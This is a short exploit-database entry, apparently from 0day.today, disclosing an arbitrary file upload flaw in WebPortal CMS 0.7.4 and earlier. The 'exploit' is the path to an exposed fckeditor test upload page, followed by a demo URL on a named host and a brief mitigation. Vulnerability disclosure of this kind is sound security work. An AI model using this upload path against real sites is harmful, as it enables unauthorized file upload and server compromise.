[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability

Author
S.W.A.T.
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3661
Category
web applications
Date add
11-09-2008
Platform
unsorted
======================================================================
WebPortal CMS <= 0.7.4 (fckeditor) Arbitrary File Upload Vulnerability
======================================================================


####################
- Exploit:
####################

http://example.com/[path]/libraries/htmleditor/editor/filemanager/upload/test.html

####################
- Demo:
####################

http://demos.ivanoculmine.com/webportal/libraries/htmleditor/editor/filemanager/upload/test.html

####################
- Solution:
####################

Restrict and grant only trusted users access to the resources.




#  0day.today [2024-11-16]  #